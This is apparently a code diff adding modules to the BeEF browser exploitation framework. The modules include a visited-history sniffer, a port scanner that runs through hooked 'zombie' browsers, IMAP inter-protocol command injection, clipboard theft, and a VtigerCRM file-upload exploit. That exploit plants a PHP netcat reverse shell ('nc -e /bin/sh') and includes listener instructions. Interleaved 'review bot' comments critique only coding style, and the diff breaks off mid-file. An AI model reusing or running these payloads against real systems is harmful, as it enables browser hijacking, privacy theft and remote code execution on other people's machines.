nnm.ru
aweber.com
google.fi
moneycontrol.com
bild.de
commentcamarche.net
addictinggames.com
perezhilton.com
plala.or.jp
bharatstudent.com
tradedoubler.com
ifeng.com
ikea.com
kakaku.com
torrents.ru
crunchyroll.com
cartoonnetwork.com
google.com.tw
pchome.com.tw
allocine.fr
xhamster.com
wsj.com
vietnamnet.vn
hattrick.org
onemanga.com
abcnews.go.com
myway.com
juggcrew.com
spankwire.com
sweetim.com
dealtime.com
musica.com
atwiki.jp
marketgid.com
stage6.com
gyao.jp
fc2web.com
leonardo.it
whenu.com
zylom.com
buzznet.com
google.com.sg
adbrite.com
slickdeals.net
ebay.es
mforos.com
truveo.com
bangbrosnetwork.com
wannawatch.com
google.ie


@@ -0,0 +1,587 @@
<?php
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Updates by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_visited() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
var urllist = document.cmd_form.urls.value.split(/\r?\n/);
var result = urllist[0];
for (var i=1; i < urllist.length; i++) {
result += '!' + urllist[i];
}
// replace sections of the code with user input
b64code = b64replace(b64code, "RAWURLS", result);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Visited URLs', get_b64_code_visited());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_visited());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Detect Visited URLs</div>
This module will attempt to detect which URLs the zombie browser has visited. It
uses the list below which can be manually edited.<br><br>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">URLs</div>
<textarea name="urls" rows="5" cols="80">
yahoo.com
google.com
youtube.com
live.com
msn.com
myspace.com
wikipedia.org
facebook.com
blogger.com
yahoo.co.jp
orkut.com
rapidshare.com
baidu.com
microsoft.com
google.co.in
google.de
qq.com
ebay.com
hi5.com
google.fr
aol.com
mail.ru
google.co.uk
sina.com.cn
fc2.com
photobucket.com
google.com.br
amazon.com
imdb.com
vkontakte.ru
google.it
google.es
google.cn
imageshack.us
youporn.com
wordpress.com
google.co.jp
yandex.ru
flickr.com
friendster.com
skyrock.com
adultfriendfinder.com
go.com
odnoklassniki.ru
google.com.mx
bbc.co.uk
craigslist.org
dailymotion.com
redtube.com
cnn.com
163.com
mininova.org
googlesyndication.com
taobao.com
google.ca
livejournal.com
fotolog.net
uol.com.br
imagevenue.com
ebay.de
naver.com
mixi.jp
rakuten.co.jp
rambler.ru
espn.go.com
free.fr
livedoor.com
rediff.com
nicovideo.jp
adobe.com
sohu.com
apple.com
56.com
yourfilehost.com
veoh.com
perfspot.com
deviantart.com
about.com
google.com.tr
youku.com
globo.com
megaupload.com
google.pl
metroflog.com
google.ru
fastclick.com
clicksor.com
geocities.com
goo.ne.jp
google.co.id
ebay.co.uk
mediafire.com
yahoo.com.cn
partypoker.com
gamespot.com
download.com
nytimes.com
google.com.au
terra.com.br
wretch.cc
weather.com
thepiratebay.org
ign.com
bebo.com
depositfiles.com
google.com.sa
ask.com
nasza-klasa.pl
adultadworld.com
nba.com
google.com.ar
ameblo.jp
zshare.net
tudou.com
digg.com
google.nl
amazon.co.jp
4shared.com
aim.com
netlog.com
2ch.net
infoseek.co.jp
studiverzeichnis.com
isohunt.com
comcast.net
doubleclick.com
nifty.com
daum.net
sourceforge.net
usercash.com
geocities.jp
mop.com
badongo.com
cnet.com
onet.pl
google.co.th
easy-share.com
pornhub.com
megarotic.com
imeem.com
gmx.net
dell.com
ig.com.br
orange.fr
xunlei.com
metacafe.com
reference.com
biglobe.ne.jp
sakura.ne.jp
information.com
homeway.com.cn
multiply.com
888.com
livejasmin.com
zol.com.cn
realitykings.com
torrentz.com
libero.it
narod.ru
web.de
google.co.za
soso.com
mozilla.com
amazon.de
filefactory.com
ebay.it
google.com.eg
icq.com
brazzers.com
google.co.ve
allegro.pl
ucoz.ru
anonym.to
tinypic.com
alice.it
blogfa.com
vnexpress.net
wp.pl
wikimedia.org
hp.com
maktoob.com
mapquest.com
google.com.co
typepad.com
invisionfree.com
paypopup.com
mercadolibre.com.mx
schuelervz.net
sendspace.com
google.com.pk
ebay.fr
spiegel.de
hatena.ne.jp
google.be
seznam.cz
linkedin.com
answers.com
mercadolivre.com.br
xtube.com
dtiblog.com
dada.net
miniclip.com
xvideos.com
megaclick.com
softonic.com
bangbros1.com
adsrevenue.net
cricinfo.com
zedo.com
freewebs.com
hyves.nl
alibaba.com
xnxx.com
worldofwarcraft.com
bankofamerica.com
files.wordpress.com
badoo.com
hao123.com
filefront.com
google.com.pe
google.cl
google.com.vn
gamefaqs.com
seesaa.net
gougou.com
china.com
xanga.com
kooora.com
tom.com
google.gr
altervista.org
amazon.co.uk
zaycev.net
ocn.ne.jp
taringa.net
cyworld.com
indiatimes.com
ziddu.com
soufun.com
rapidshare.de
google.at
slide.com
bestbuy.com
tripod.com
liveinternet.ru
jugem.jp
flurl.com
fanfiction.net
thottbot.com
google.se
wwe.com
softpedia.com
pcpop.com
break.com
google.ch
chase.com
aebn.net
reuters.com
smileycentral.com
megavideo.com
marca.com
fling.com
eastmoney.com
debonairblog.com
altavista.com
xboard.us
freeones.com
myfreepaysite.com
netflix.com
google.ro
technorati.com
pchome.net
gametrailers.com
livescore.com
payserve.com
sonico.com
symantec.com
tagged.com
webshots.com
fotka.pl
google.com.my
last.fm
pornotube.com
ifolder.ru
tianya.cn
mozilla.org
archive.org
google.pt
gaiaonline.com
kaskus.us
target.com
yaplog.jp
21cn.com
walmart.com
tv.com
foxsports.com
dantri.com.vn
sogou.com
disney.go.com
ultimate-guitar.com
brazzersnetwork.com
uwants.com
ku6.com
dmm.co.jp
interia.pl
126.com
playstation.com
newgrounds.com
neopets.com
bangbros.com
runescape.com
xinhuanet.com
videosz.com
exblog.jp
foxnews.com
mywebsearch.com
istockphoto.com
elmundo.es
cocolog-nifty.com
nih.gov
newegg.com
skype.com
naukri.com
zango.com
match.com
shopping.com
sexyono.com
tu.tv
verycd.com
imagefap.com
blogchina.com
usps.com
att.com
yimg.com
wow-europe.com
mtv.com
washingtonpost.com
att.net
stumbleupon.com
cmfu.com
google.co.hu
milliyet.com.tr
esnips.com
forbes.com
livedoor.biz
vagos.es
wikia.com
engadget.com
leo.org
hurriyet.com.tr
porndirt.com
real.com
google.com.ph
monster.com
careerbuilder.com
over-blog.com
it168.com
letitbit.net
duowan.com
conduit.com
mobile9.com
mediaplex.com
clicksor.net
excite.co.jp
linternaute.com
hornymatches.com
wowhead.com
googlepages.com
startimes2.com
ebay.com.au
1und1.de
myvideo.de
rmxads.com
wamu.com
ups.com
meebo.com
jeuxvideo.com
no-ip.com
petardas.com
iwiw.hu
repubblica.it
dion.ne.jp
adult-empire.com
discuss.com.hk
msn.ca
vmn.net
so-net.ne.jp
starware.com
xbox.com
watch-movies.net
t-online.de
torrentreactor.net
utorrent.com
pornaccess.com
89.com
freelotto.com
univision.com
guardian.co.uk
btjunkie.org
rr.com
google.ae
verizon.net
teacup.com
mercadolibre.com.ar
expedia.com
forumfree.net
corriere.it
6park.com
ameba.jp
people.com.cn
mlb.com
shinobi.jp
minijuegos.com
ezinearticles.com
msplinks.com
xiaonei.com
pogo.com
iij4u.or.jp
forumcommunity.net
01net.com
ibm.com
dyndns.org
mynet.com
yam.com
google.com.ua
squidoo.com
mobile.de
google.dk
4chan.org
flixster.com
godaddy.com
wordreference.com
rude.com
110mb.com
bramjnet.com
people.com
sparkstudios.net
nokia.com
sapo.pt
zedge.net
wowarmory.com
chinaren.com
warez-bb.org
circuitcity.com
torrentz.ws
sify.com
thefreedictionary.com
nnm.ru
aweber.com
google.fi
moneycontrol.com
bild.de
commentcamarche.net
addictinggames.com
perezhilton.com
plala.or.jp
bharatstudent.com
tradedoubler.com
ifeng.com
ikea.com
kakaku.com
torrents.ru
crunchyroll.com
cartoonnetwork.com
google.com.tw
pchome.com.tw
allocine.fr
xhamster.com
wsj.com
vietnamnet.vn
hattrick.org
onemanga.com
abcnews.go.com
myway.com
juggcrew.com
spankwire.com
sweetim.com
dealtime.com
musica.com
atwiki.jp
marketgid.com
stage6.com
gyao.jp
fc2web.com
leonardo.it
whenu.com
zylom.com
buzznet.com
google.com.sg
adbrite.com
slickdeals.net
ebay.es
mforos.com
truveo.com
bangbrosnetwork.com
wannawatch.com
google.ie
www.twitter.com
twitter.com
www.myspace.com
www.facebook.com
www.slashdot.org
slashdot.org
www.livejournal.com
livejournal.com
blogger.com
www.blogger.com
gather.com
www.gather.com
ziggs.com
www.ziggs.com
plaxo.com
www.plaxo.com
www.care2.com
care.com
xing.com
www.xing.com
www.linkedin.com
linkedin.com
www.ryze.com
ryze.com
ecademy.com
www.ecademy.com
www.careerbuilder.com
careerbuilder.com
www.monster.com
monster.com
</textarea>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
</body>
</html>
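Review bot: The file ends with `</body>` and `</html>` although it never opens either element. The other module pages in this commit are fragments that stop at the closing `</div>`, so these two tags produce invalid markup once the fragment is embedded in the console and should be removed. In `get_b64_code_visited` the loop that builds `result` is a hand-written join and can be replaced with `var result = urllist.join('!');`. The textarea's default list also contains repeated entries (for example `blogger.com`, `monster.com` and `careerbuilder.com` each appear twice). Since the same list exists as a separate data file in this commit, a comment saying which copy is authoritative would prevent the two from drifting apart.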


@@ -0,0 +1 @@
Detect Visited URLs


@@ -0,0 +1,8 @@
www.yahoo.com
yahoo.com
www.google.com
google.com
adwords.google.com
gmail.com
www.gmail.com
gmail.google.com


@@ -0,0 +1,41 @@
adwords.google.com
blogger.com
care.com
careerbuilder.com
ecademy.com
facebook.com
gather.com
gmail.com
gmail.google.com
google.com
linkedin.com
livejournal.com
monster.com
myspace.com
plaxo.com
ryze.com
slashdot.org
twitter.com
www.blogger.com
www.care2.com
www.careerbuilder.com
www.ecademy.com
www.facebook.com
www.gather.com
www.gmail.com
www.google.com
www.linkedin.com
www.livejournal.com
www.monster.com
www.myspace.com
www.plaxo.com
www.ryze.com
www.slashdot.org
www.twitter.com
www.xing.com
www.yahoo.com
www.ziggs.com
xing.com
yahoo.com
ziggs.com


@@ -0,0 +1,33 @@
www.twitter.com
twitter.com
www.myspace.com
myspace.com
www.facebook.com
facebook.com
www.slashdot.org
slashdot.org
www.livejournal.com
livejournal.com
blogger.com
www.blogger.com
gather.com
www.gather.com
ziggs.com
www.ziggs.com
plaxo.com
www.plaxo.com
www.care2.com
care.com
xing.com
www.xing.com
www.linkedin.com
linkedin.com
www.ryze.com
ryze.com
ecademy.com
www.ecademy.com
www.careerbuilder.com
careerbuilder.com
www.monster.com
monster.com


@@ -0,0 +1,57 @@
function get_content(f){
return (f.contentDocument) ? f.contentDocument : f.contentWindow.document;
}
function is_visited(l){
var dummy = document.getElementById("HIDDEN_FRAME");
if (!dummy){
dummy = document.createElement("iframe");
dummy.style.visibility = "hidden";
dummy.id = "HIDDEN_FRAME";
document.body.appendChild(dummy);
var dummycontent = get_content(dummy);
var style = "<style>a:visited{width:0px};</style>";
dummycontent.open();
dummycontent.write(style);
dummycontent.close();
} else {
var dummycontent = get_content(dummy);
}
var dummylink = dummycontent.createElement("a");
dummylink.href = l;
dummycontent.body.appendChild(dummylink);
if (dummylink.currentStyle) {
visited = dummylink.currentStyle["width"];
} else {
visited = dummycontent.defaultView.getComputedStyle(dummylink, null).getPropertyValue("width");
}
return (visited == "0px");
}
function check_list(rawurls) {
var result = "The browser has visited:";
var found = false;
var urllist = rawurls.split(/!/);
for (var i=0; i < urllist.length; i++) {
if(is_visited('http://' + urllist[i])) {
result += String.fromCharCode(10);
result += 'http://' + urllist[i];
found = true;
}
}
if(!found) {
result += String.fromCharCode(10);
result += "none found";
}
return result;
}
return_result(result_id, check_list('RAWURLS'));
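Review bot: `visited` in `is_visited` is assigned without a declaration, so it becomes a property of the global object of whatever page runs this script; declare it with `var visited;` before the `if (dummylink.currentStyle)` test. `dummycontent` is declared with `var` in both arms of the `if (!dummy)` test, which is legal but reads better as a single `var dummycontent;` above it. The same undeclared-assignment pattern appears in later files of this commit: `index` in `AttackAPI.PortScanner.scanTarget`, `i`, `myform` and `myExt` in the IMAP4 template, and `baseurl`, `http_request` and `result` in the vtiger template. The file also has no header comment; one line saying that the check reads the computed `width` of an `a:visited` link would tell a reader which browser behaviour it depends on, a behaviour that current browsers deliberately no longer expose to scripts.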


@@ -0,0 +1,97 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
session_start();
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
// set results file variables
$results_file = MODULE_TMP_DIR . md5(getcwd());
$rand = md5(rand());
$_SESSION[md5(getcwd())] = $rand;
$_SESSION[$rand] = md5(getcwd());
?>
<script>
// show module results section
new Element.show('module_results');
<?
// set javascript variables and update modules results section
$tmp = md5(getcwd());
echo "result_id = '" . $_SESSION[$tmp] . "';\n";
echo "mod.id = '" . $_SESSION[$tmp] . "';\n";
echo "mod.heartbeat();\n";
?>
Element.Methods.construct_code = function() {
var i = 0;
var port_pos = 0;
var b64code_template = '<? echo get_b64_file(JS_FILE); ?>';
zl.selected_zombies.each( function(id){
b64code = b64replace(b64code_template, "TARGET", document.myform.target_.value);
b64code = b64replace(b64code, "TIMEOUT", document.myform.timeout.value);
// construct/split ports
port_str = document.myform.ports.value;
port_arr = port_str.split(',');
zombie_num = zl.selected_zombies.length;
port_num = port_arr.length;
port_str = "";
max = (port_num/zombie_num) * (i+1);
for(var j=port_pos; j<max; j++, port_pos++) {
if(port_str != "") port_str += ',';
port_str += port_arr[j];
}
i++;
// if ports then send port scanner code
if(port_str != "") {
b64code = b64replace(b64code, "PORTS", port_str);
var params = 'data=' + b64code;
new Ajax.Updater('module_status', 'send_cmds.php?action=cmd&result_id=' + result_id + '&zombie=' + id, {method:'post',parameters:params,asynchronous:false});
}
});
if(i == 0) {
// no zombies selected
beef_error('No Zombie Selected. Select Zombie(s)');
}
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Distributed Port Scanner</div>
<div class="entry">
This module will send a subset of the ports to scan to each selected zombie browser. The
timeout parameter may need adjusting depending upon network latency.<br><br>
Web browsers explictly (programmatically) prohibit connection to some ports. The results
of these ports are indeterminate. For a full list please refer to
the <a href=http://www.mozilla.org/projects/netlib/PortBanning.html>mozilla</a> page.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target</div>
<input type="text" name="target_" value="www.google.com"/>
<div id="module_subsection_header">Port(s)</div>
<input type="text" name="ports" value="80,220,8080"/>
<div id="module_subsection_header">Timeout</div>
<input type="text" name="timeout" value="1500"/>
<input class="button" type="button" value="Scan" onClick="javascript:construct_code()"/>
</form>
</div>
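Review bot: `$rand = md5(rand());` derives the result id from `rand()`, which is not a cryptographic generator and has a small output range, so hashing it with MD5 adds no unpredictability. The value is echoed as `result_id` and `mod.id` and is passed in the `send_cmds.php` query string; if it is meant to keep one session's results apart from another's (not visible here), take it from a CSPRNG instead, e.g. `$rand = bin2hex(openssl_random_pseudo_bytes(16));`. The link `<a href=http://www.mozilla.org/projects/netlib/PortBanning.html>` should also have its attribute value quoted.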


@@ -0,0 +1 @@
Distributed Port Scanner


@@ -0,0 +1,46 @@
var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
}
};
function do_main(){
var result = "";
var callback = function (target, port, status) {
result = target + ":" + port + " " + status;
return_result(result_id, result);
};
AttackAPI.PortScanner.scanTarget(callback, "TARGET", "PORTS", TIMEOUT);
}
do_main()
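Review bot: `scanPort` has no comment saying how it decides a status: `img.onload` is set to the same handler as `img.onerror`, so either image event reports `'open'` and only the timer reports `'closed'`, which makes the label a timing inference rather than an observed connection state. A comment above the function such as `// status is inferred: any image event before the timeout => 'open', otherwise 'closed'` would make that explicit for anyone interpreting the results. `var timeout = (timeout == null)?100:timeout;` redeclares the parameter; drop the `var` and write `timeout = (timeout == null) ? 100 : timeout;`. The final `do_main()` is missing its semicolon.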


@@ -0,0 +1,55 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
var temp_cmds = document.myform.cmd_str.value;
temp_cmds = temp_cmds.replace(/\n/g, "\\\\n")
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
b64code = b64replace(b64code, "COMMAND", temp_cmds);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Inter-protocol Communication: IMAP4 </div>
<div class="entry">
Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
zombie browser will send commands to an IMap4 server. The target address can be
on the zombie's subnet which is potentially not directly accessible from the Internet.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="ip_str" value="localhost"/>
<div id="module_subsection_header">Commands</div>
<textarea name="cmd_str" rows="5" cols="80">a001 CAPABILITY
a01 login root password
a002 logout</textarea>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>
</div>
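Review bot: The final `</div>` has no matching opening tag: `module_subsection` is already closed by the `</div>` on the line before it, so this one closes an element of the surrounding page. `var rtnval = "OK Clicked";` is never read in this file and looks copied from another module; remove it unless `do_send` reads it (not visible here). `temp_cmds = temp_cmds.replace(/\n/g, "\\\\n")` is missing its terminating semicolon, and the `href` in the description paragraph is unquoted.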


@@ -0,0 +1 @@
IMap4 IPC


@@ -0,0 +1,74 @@
var target_ip = 'IP_ADDRESS';
var target_port = '220';
var payload = "";
var scr_l = '<scr' + 'ipt\>';
var scr_r = '</scr' + 'ipt>';
var max_line_len = 23;
function add_line(cmd) {
payload += scr_l + cmd + scr_r + "\\\n";
}
function construct_js(js) {
add_line("a=''");
js = js.replace(/ /g, "SP")
for(i=0; i<js.length; i+=max_line_len) {
add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
}
add_line("s=String.fromCharCode(0x20)");
add_line("a=a.replace(/SP/g,s)");
}
var code = "";
function add_js(js) {
code+=js+";";
}
add_js("var result_id='" + result_id + "'");
add_js("function include(script_filename) {");
add_js("var html_doc = document.getElementsByTagName('head').item(0);");
add_js("var js = document.createElement('script');");
add_js("js.src = script_filename;");
add_js("js.type = 'text/javascript';");
add_js("js.defer = true;");
add_js("html_doc.appendChild(js);");
add_js("return js;");
add_js("}");
add_js("include('" + beef_url + "' + '/hook/ipc_imap.js.php');");
construct_js(code);
add_line("eval(a)");
add_line("//__END__");
payload += "COMMAND";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + port + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
do_submit(target_ip, target_port, payload);


@@ -0,0 +1,76 @@
<?
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
// Where did our file end up?
// Example /storage/2009/June/week3/<file>:
$year = date("Y");
$month = date("F");
$weekNum = date("W") - date("W",strtotime(date("Y-m-01"))) + 1;
$path = "/storage/$year/$month/week$weekNum/"
?>
<script>
var rtnval = "vtiger exploit sent";
function get_b64_code_vtiger() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "ATTACKURL", document.myform.vtiger_url.value);
b64code = b64replace(b64code, "FILEPATH", document.myform.vtiger_filepath.value);
b64code = b64replace(b64code, "CONNECTHOST", document.myform.vtiger_host.value);
b64code = b64replace(b64code, "CONNECTPORT", document.myform.vtiger_port.value);
b64code = b64replace(b64code, "RTN", rtnval);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Vtiger CRM Upload Exploit', get_b64_code_vtiger());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_vtiger());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Vtiger CRM Upload Exploit</div>
This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability
which is exploited is the in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a>.<br><br>
Start the listener on the host:
<pre>
nc -nvlp 8888
</pre>
<div id="module_subsection">
<form name="myform">
Target Web Server
<input type="text" name="vtiger_url" value="http://localhost/vtigercrm"/>
Target Directory
<input type="text" name="vtiger_filepath" value="<?php echo $path;?>"/>
Reverse Bindshell Host
<input type="text" name="vtiger_host" value="localhost"/>
Reverse Bindshell Port
<input type="text" name="vtiger_port" value="8888"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
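Review bot: The file opens with the short tag `<?` but later uses `<?php echo $path;?>`; short tags are parsed only when `short_open_tag` is enabled, and with it off the opening block is sent to the browser as text instead of being executed. Use `<?php` throughout, here and in the other module pages of this commit that start with `<?`. `$path = "/storage/$year/$month/week$weekNum/"` relies on the closing `?>` to terminate the statement; add the semicolon. `$path` is echoed into the `value` attribute without `htmlspecialchars()`, which is harmless for the date-derived string built here but worth doing by habit.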


@@ -0,0 +1,2 @@
Vtiger CRM Upload Exploit


@@ -0,0 +1,161 @@
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// http://site/vtigercrm//
baseurl = "ATTACKURL";
function do_upload(){
// start AJAX file upload in 1 second
window.setTimeout("ajax_upload()", 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
// Setup the AJAX POST
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var binary;
var filename;
var mytext;
http_request = false;
http_request = new XMLHttpRequest();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\\n'
+ '\\n'
+ 3000000 + '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\\n'
+ 'Content-Type: application/x-httpd-php' + '\\n'
+ '\\n'
+ '<\?php' + '\\n'
+ 'passthru("/bin/nc -e /bin/sh CONNECTHOST CONNECTPORT");' + '\\n'
+ '\?>' + '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\\n'
+ '\\n'
+ 'vtiger-fun.PHP'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\\n'
+ '\\n'
+ 'drop it like its hot' + '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="save"' + '\\n'
+ '\\n'
+ 'Attach' + '\\n'
+ boundary;
http_request.onreadystatechange = requestdone;
http_request.open('POST', targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
}
// ajax call done... File uploaded? :)
function requestdone() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
// find our file
do_callfile();
} else {
// fail silently
}
}
}
function requestfile() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
} else {
// fail silently
}
}
}
// find our file :)
//
// Dirty brute force
function do_callfile(){
var i=0;
for (i=0;i<=1000;i++)
{
http_request = false;
http_request = new XMLHttpRequest();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "FILEPATH" + i + "_vtiger-fun.PHP";
var requestbody = "birds of a feather flock together";
http_request.onreadystatechange = requestfile;
http_request.open('POST', findurl, true);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
}
}
// Add your clean up routine here.
function do_cleanup() {
//document.write("Maybe your security team should check out owasp.org? ;)");
}
// Try the upload
function do_main(){
do_upload();
}
// Run the sploit
do_main();
do_cleanup();
return_result(result_id, "RTN");
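Review bot: `window.setTimeout("ajax_upload()", 1000)` passes a string, which the browser compiles the way `eval` does; pass the function itself, `window.setTimeout(ajax_upload, 1000);`. In `ajax_upload` the locals `binary`, `filename`, `mytext` and `boundaryString` are declared and never used, and `do_cleanup` has an empty body apart from a commented-out line; remove them or say in a comment why they are kept.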


@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "ALERTSTRING", document.myform.alert_str.value);
b64code = b64replace(b64code, "RTN", "Alert Clicked");
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Alert Dialog', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Alert Dialog</div>
This module will display an alert dialog in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">String</div>
<input type="text" width="90%" name="alert_str" value="BeEF Alert Dialog"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
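Review bot: `get_b64_code_alert = function () {` assigns to an undeclared name, while the sibling module pages in this commit define the same helper as a function declaration (`function get_b64_code_cb() {`); write `function get_b64_code_alert() {` for consistency and to avoid the implicit global. `width="90%"` is not an attribute of a text input; use `size` or a `style` width instead.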


@@ -0,0 +1 @@
Alert Dialog


@@ -0,0 +1,6 @@
function do_main(){
alert("ALERTSTRING");
}
do_main();
return_result(result_id, "RTN");


@@ -0,0 +1,42 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_cb() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Clipboard Theft', get_b64_code_cb());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cb());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Clipboard Theft</div>
This module will work automatically with Internet Explorer browsers before 7.x. In later
versions of Internet Explorer, the browser will prompt the user and ask for permission to
access the clipboard. <br><br>
<div id="module_subsection">
<form>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Clipboard Theft


@@ -0,0 +1,2 @@
return_result(result_id, clipboardData.getData("Text"));


@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_deface() {
// javascript is loaded from a file - it could be hard coded
